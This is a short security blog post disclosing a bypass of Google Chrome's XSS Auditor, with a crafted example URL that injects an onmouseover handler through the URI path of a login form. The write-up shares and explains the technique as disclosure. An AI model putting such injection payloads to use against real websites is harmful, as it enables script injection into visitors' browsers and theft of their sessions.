Update: The bug has been reported to Google Chrome team already. The details can be found here: https://code.google.com/p/chromium/issues/detail?id=330972. The team was not able to recreate the issue in the test environment. I validated this issue on the Command and Control (C&C) panel of a botnet :) and I was not in a state to reveal the details of that panel. Anyways the bug is in Wont Fix state and Google Chrome is still vulnerable to these types of XSS bypasses.
Recently, I encountered an XSS auditor bypass in Google Chrome ( <= 32.0.1700.41 m Aura) while working on my research.
Google Chrome Latest Version Tested ! |
http://www.example.com/index.php?m=login which generates the form as follows:
For Injection, we crafted the URL as follows:
http://www.example.com/index.php/" onmouseover="JavaScript:alert(document.location)" name="?m=login .In this injection, we have not injected in "m" parameter rather we have played with the URI structure. The idea is to tweak the form layout rather the value accepted by the "m" parameter. If you place your injection in "m" parameter, it gets nullified by the XSS Auditor. Let's see how the injection occurs:
As a result, Google Chrome XSS auditor is bypassed.
Inference: Few ideas that should be taken into consideration:
1. The design of web applications impact the XSS auditor.
2. Instead of always targeting the HTTP parameters, play around with the URI structure also.
Note: Internet Explorer blocked this vector.
Additional Readings: Check out the inside details of Google Chrome XSS Auditor:
- XSS Auditor Source Code : https://code.google.com/p/webkit-mirror/source/browse/Source/WebCore/html/parser/XSSAuditor.cpp
- More about XSS Auditor Read here: http://www.collinjackson.com/research/xssauditor.pdf
Enjoy !